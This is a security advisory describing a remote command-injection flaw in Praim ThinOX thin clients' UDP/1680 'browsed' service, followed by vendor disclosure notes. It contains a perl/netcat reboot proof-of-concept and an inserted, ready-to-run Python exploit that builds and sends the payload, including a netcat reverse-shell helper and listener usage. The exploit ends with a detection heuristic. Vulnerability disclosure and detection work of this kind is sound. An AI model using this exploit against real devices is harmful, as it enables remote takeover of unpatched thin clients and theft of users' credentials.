Remote code execution on Praim thin client devices

Author: Roberto Paleari (@rpaleari), Aristide Fattori (@joystick), and Ruggero Strabla (@rstrabla)

During a recent security assessment we had the opportunity to analyze a thin client device manufactured by Praim, an Italian company that, according to its web site, has "nearly 1 million user installations" of its "Thin & Zero solutions". In detail, our assessment involved some ThinOX I9020 devices, updated to the latest firmware version available.

We noticed that our target device exposed a UDP service listening on port 1680. This service is enabled in the default configuration and is implemented by a binary named "browsed".

More precisely, "browsed" is a complex application used for the centralized management of the thin client which, among other things, also includes an FTP service to upgrade the device firmware. A closer look at the binary revealed a command-injection vulnerability that can be trivially exploited by an attacker located on the same LAN as the thin client.

Technical details

Data received by "browsed" on port UDP/1680 is eventually passed to a system() library call without being sanitized. The code snippet in the figure below shows the program building a command-line string from the payload of the UDP datagram. The only constraint is that the check at program address 0x00011904 must be satisfied for the system() call to be reached; this is done by setting a specific input byte (at offset 70 of the UDP datagram) to four.


Command-injection vulnerability

As a proof-of-concept, the following command exploits this issue and executes "reboot" on the thin client, immediately rebooting the device:

perl -e 'print "\";reboot;\"" . "A"x59 . "\x04" . "B"x63' | nc -u 1.2.3.4 1680 

Obviously, in the command above "1.2.3.4" must be replaced with the actual IP address of the vulnerable ThinOX device.

The device already includes the netcat utility, so gaining a remote shell on the thin client is just a matter of changing the command line above so that nc connects back to the attacker's IP and spawns a shell, as shown in the picture below (astute readers will notice that the connect-back shell originates from 127.0.0.1; the reason is that, for this test, we executed the vulnerable application inside an emulated environment).

Gaining a connect-back shell from the Praim ThinOX device
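The Python script below is an added example written for this page; it is not code from the original advisory or from Praim. It generalizes the perl one-liner above and the connect-back variant just described: it builds a datagram with the same layout as the proof-of-concept (the injected string `";<command>;"`, 'A' padding, the 0x04 byte, then 63 trailing 'B's, 133 bytes in total), so that the 0x04 byte lands exactly where the one-liner puts it (the 70th byte, index 69 counting from zero, since the PoC prefix is 10 + 59 bytes), and sends it to UDP/1680. Only the port, the flag value and the PoC layout come from the advisory; all names are ours, the `nc ... -e /bin/sh` reverse-shell string assumes a netcat build that supports `-e` (the advisory does not say which flags the device's nc accepts), and the detection heuristic at the end is our own suggestion for a network sensor, not something the advisory describes.

```python
"""Payload builder for the Praim ThinOX "browsed" UDP/1680 command injection.

Added example: not code from the original advisory or from Praim. Only the
port, the flag byte value (4) and the proof-of-concept layout come from the
advisory; names, the reverse-shell command and the detection heuristic are
assumptions made for illustration.
"""
import socket
import sys

BROWSED_PORT = 1680
FLAG_OFFSET = 69        # zero-based index of the byte the check at 0x00011904 compares to 4;
                        # the PoC one-liner puts "\x04" here (10 + 59 bytes of prefix)
FLAG_VALUE = 0x04
TRAILER = b"B" * 63     # trailing filler, kept identical to the PoC because the advisory
                        # does not say whether the parser needs it
MAX_COMMAND_LEN = FLAG_OFFSET - len(b'";' + b';"')   # 65 bytes of injected command


def build_payload(command: str) -> bytes:
    """Return a datagram laid out like the proof-of-concept.

    The PoC string '";reboot;"' suggests the payload is pasted inside a
    double-quoted argument of the command line handed to system(): the leading
    '";' closes that quote and terminates the original command, the injected
    command follows, and ';"' reopens the quote so the remainder still parses.
    """
    if '"' in command or "\x00" in command or "\n" in command:
        raise ValueError("command must not contain double quotes, NUL or newline")
    injected = b'";' + command.encode() + b';"'
    if len(injected) > FLAG_OFFSET:
        raise ValueError(f"command too long: at most {MAX_COMMAND_LEN} bytes fit before the flag byte")
    padding = b"A" * (FLAG_OFFSET - len(injected))   # "A"x59 for the "reboot" PoC
    return injected + padding + bytes([FLAG_VALUE]) + TRAILER


def reverse_shell_command(attacker_ip: str, attacker_port: int) -> str:
    """Connect-back shell via the device's netcat (assumption: the nc build supports -e)."""
    return f"nc {attacker_ip} {attacker_port} -e /bin/sh"


def send_payload(target_ip: str, command: str, port: int = BROWSED_PORT) -> int:
    """Send the crafted datagram to the thin client; returns the number of bytes sent."""
    datagram = build_payload(command)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        return sock.sendto(datagram, (target_ip, port))


SHELL_METACHARS = frozenset(b";|&`$\n")


def looks_like_browsed_injection(datagram: bytes) -> bool:
    """Detection heuristic (our assumption, not from the advisory): a UDP/1680
    datagram whose flag byte is 4 and whose bytes before it contain shell
    metacharacters deserves an alert; management traffic should not need them."""
    if len(datagram) <= FLAG_OFFSET or datagram[FLAG_OFFSET] != FLAG_VALUE:
        return False
    return any(b in SHELL_METACHARS for b in datagram[:FLAG_OFFSET])


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} <thinox-ip> [command]")
    target = sys.argv[1]
    cmd = sys.argv[2] if len(sys.argv) > 2 else "reboot"
    print(f"sent {send_payload(target, cmd)} bytes to {target}:{BROWSED_PORT}")
```

Run as `python3 browsed_poc.py 1.2.3.4` to reproduce the reboot PoC, or pass `"$(python3 -c 'from browsed_poc import reverse_shell_command as r; print(r("10.0.0.1", 4444))')"` style command strings for the connect-back case (with a listener such as `nc -l -p 4444` waiting on the attacker host). The `looks_like_browsed_injection` check is the kind of rule one would put on a sensor watching UDP/1680 while the vendor fix is pending.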

Disclosure

We notified Praim of this vulnerability on February 24th, 2014. The vendor promptly replied and started working on the issue. However, some weeks later (on March 14th) Praim informed us that they were aware of the issue but, according to them, "no sensitive data is stored inside the thin client", so they are not planning to release a fix anytime soon. We do not fully agree with this statement, as attackers could still abuse a compromised thin client to intercept sensitive data, e.g., by installing a key logger on the device and capturing authentication credentials for remote hosts as soon as the user types them, even though they are never stored persistently on the thin client.

According to Praim, the vulnerability will probably be addressed in a future firmware version (still under development) that will replace the UDP service ("browsed") with a completely different management interface.
